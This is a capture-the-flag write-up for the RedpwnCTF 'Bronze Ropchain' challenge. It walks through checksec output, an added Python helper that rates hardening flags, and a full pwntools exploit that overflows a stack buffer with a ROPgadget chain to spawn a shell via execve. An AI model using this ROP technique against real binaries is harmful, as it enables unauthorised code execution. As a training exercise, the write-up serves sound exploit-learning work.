Written on 19.8.18

This challenge deserves a quick write-up; I don't use ropchain much myself. Thanks to 梦师傅 for the pointers today, hehe orz

Because it's a bit different

checksec

```
kk@ubuntu:~/Desktop/black/CTF/RedpwnCTF/Bronze Ropchain$ checksec ./bronze_ropchain 
[*] '/home/kk/Desktop/black/CTF/RedpwnCTF/Bronze Ropchain/bronze_ropchain'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)
```

file/ldd

```
kk@ubuntu:~/Desktop/black/CTF/RedpwnCTF/Bronze Ropchain$ file ./bronze_ropchain 
./bronze_ropchain: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, for GNU/Linux 3.2.0, BuildID[sha1]=16a9964f0e243870ebccdaf50522bcee80741083, not stripped
```

```
kk@ubuntu:~/Desktop/black/CTF/RedpwnCTF/Bronze Ropchain$ ldd ./bronze_ropchain 
not a dynamic executable
```

Both commands show that the binary is statically linked.
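The two outputs above say more together than either does alone. As an added example (not part of the write-up), the Python helper below parses checksec-style output and the `file` line and turns them into hardening findings, including the caveat this write-up ran into: checksec reports "Canary found" whenever the `__stack_chk_fail` symbol is present, and a statically linked glibc brings that symbol along even when the program's own functions never load the canary from gs:0x14. The sample strings are the outputs quoted above, pasted in as constructed input.

```python
import re

# Constructed input: the checksec output quoted in the write-up.
CHECKSEC_OUTPUT = """\
[*] '/home/kk/Desktop/black/CTF/RedpwnCTF/Bronze Ropchain/bronze_ropchain'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)
"""

# Constructed input: the `file` output quoted in the write-up (BuildID dropped).
FILE_OUTPUT = ("./bronze_ropchain: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), "
               "statically linked, for GNU/Linux 3.2.0, not stripped")


def parse_checksec(text):
    """Parse 'Key:   value' lines (pwntools/checksec style) into a dict."""
    fields = {}
    for line in text.splitlines():
        m = re.match(r"\s*([A-Za-z]+):\s+(.*\S)\s*$", line)
        if m:
            fields[m.group(1)] = m.group(2)
    return fields


def is_static(file_output):
    """True when `file` reports a statically linked ELF."""
    return "statically linked" in file_output


def assess(fields, static):
    """Return (severity, message) findings; severity is 'weak' or 'check'.

    'weak' marks a mitigation that is absent or partial; 'check' marks a value
    that checksec reports but that needs manual confirmation.
    """
    findings = []
    if "Full" not in fields.get("RELRO", ""):
        findings.append(("weak", "RELRO is not Full: GOT entries stay writable after load"))
    if fields.get("PIE", "").startswith("No PIE"):
        findings.append(("weak", "No PIE: code and data sit at fixed addresses, so gadget "
                                 "addresses can be hardcoded"))
    if "NX enabled" not in fields.get("NX", ""):
        findings.append(("weak", "NX disabled: stack and heap are executable"))
    stack = fields.get("Stack", "")
    if "Canary found" in stack:
        if static:
            # checksec infers the canary from the __stack_chk_fail symbol; a static
            # libc contains it regardless of how the program itself was compiled.
            findings.append(("check", "Canary reported but binary is static: confirm the "
                                      "vulnerable function really loads the canary from gs:0x14"))
    else:
        findings.append(("weak", "No stack canary"))
    return findings


if __name__ == "__main__":
    info = parse_checksec(CHECKSEC_OUTPUT)
    for severity, message in assess(info, is_static(FILE_OUTPUT)):
        print("[%s] %s" % (severity, message))
```

On this binary the helper flags Partial RELRO and No PIE as weak, and downgrades "Canary found" to something to verify by hand, which is exactly what the IDA check below confirms.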
ida
The vulnerability is easy to find: a stack overflow.


PS: When I saw that the canary was enabled, I wanted to leak the canary first, but it turns out that's not needed: the binary is statically linked, and in IDA there is no read of the canary dword (梦师傅 taught me this, hahaha), so there is actually no canary.
Run it and see:

```
kk@ubuntu:~/Desktop/black/CTF/RedpwnCTF/Bronze Ropchain$ ./bronze_ropchain 
What is your name?
kkkkk
Hello kkkkk
! How are you on this fine day?
```

The input is under 0x400 bytes, and the reading function stops at \x0a.
So we use ROPgadget to find a ropchain:

```
ROPgadget --binary ./bronze_ropchain --badbytes '00|0a' --ropchain
```

The `--badbytes` option asks for a ropchain that contains no \x00 or \x0a bytes.


Exploit 👇

```python
#!/usr/bin/env python
from pwn import *
from struct import pack

# io = remote('chall2.2019.redpwn.net', 4004)
io = process('./bronze_ropchain')

io.recv()

# Chain produced by ROPgadget --ropchain with badbytes 00|0a. It writes the
# string "/bin//sh\0" into .data with mov [edx], eax, then calls
# execve("/bin//sh", argv, envp) via int 0x80 with eax = 11 (SYS_execve on i386).
p = b''
# .data + 0 = "/bin"
p += pack('<I', 0x0806ef2b) # pop edx ; ret
p += pack('<I', 0x080da060) # @ .data
p += pack('<I', 0x080564b4) # pop eax ; pop edx ; pop ebx ; ret
p += b'/bin'
p += pack('<I', 0x080da060) # padding without overwrite edx
p += pack('<I', 0x41414141) # padding
p += pack('<I', 0x08056fe5) # mov dword ptr [edx], eax ; ret
# .data + 4 = "//sh"
p += pack('<I', 0x0806ef2b) # pop edx ; ret
p += pack('<I', 0x080da064) # @ .data + 4
p += pack('<I', 0x080564b4) # pop eax ; pop edx ; pop ebx ; ret
p += b'//sh'
p += pack('<I', 0x080da064) # padding without overwrite edx
p += pack('<I', 0x41414141) # padding
p += pack('<I', 0x08056fe5) # mov dword ptr [edx], eax ; ret
# .data + 8 = 0 (string terminator; also serves as an empty argv/envp array)
p += pack('<I', 0x0806ef2b) # pop edx ; ret
p += pack('<I', 0x080da068) # @ .data + 8
p += pack('<I', 0x080565a0) # xor eax, eax ; ret
p += pack('<I', 0x08056fe5) # mov dword ptr [edx], eax ; ret
# Syscall arguments: ebx = path, ecx = argv, edx = envp
p += pack('<I', 0x080481c9) # pop ebx ; ret
p += pack('<I', 0x080da060) # @ .data
p += pack('<I', 0x0806ef52) # pop ecx ; pop ebx ; ret
p += pack('<I', 0x080da068) # @ .data + 8
p += pack('<I', 0x080da060) # padding without overwrite ebx
p += pack('<I', 0x0806ef2b) # pop edx ; ret
p += pack('<I', 0x080da068) # @ .data + 8
# eax = 11: zero it, then inc eleven times (avoids a 0x0000000b immediate with bad bytes)
p += pack('<I', 0x080565a0) # xor eax, eax ; ret
p += pack('<I', 0x0807c3ba) # inc eax ; ret
p += pack('<I', 0x0807c3ba) # inc eax ; ret
p += pack('<I', 0x0807c3ba) # inc eax ; ret
p += pack('<I', 0x0807c3ba) # inc eax ; ret
p += pack('<I', 0x0807c3ba) # inc eax ; ret
p += pack('<I', 0x0807c3ba) # inc eax ; ret
p += pack('<I', 0x0807c3ba) # inc eax ; ret
p += pack('<I', 0x0807c3ba) # inc eax ; ret
p += pack('<I', 0x0807c3ba) # inc eax ; ret
p += pack('<I', 0x0807c3ba) # inc eax ; ret
p += pack('<I', 0x0807c3ba) # inc eax ; ret
p += pack('<I', 0x080495b3) # int 0x80

# 0x18 bytes of buffer plus 4 bytes of saved frame pointer, then the chain
# starts at the saved return address.
payload = b"a" * 0x18 + b"a" * 4 + p

io.sendline(payload)
io.sendline(b'')

io.interactive()
```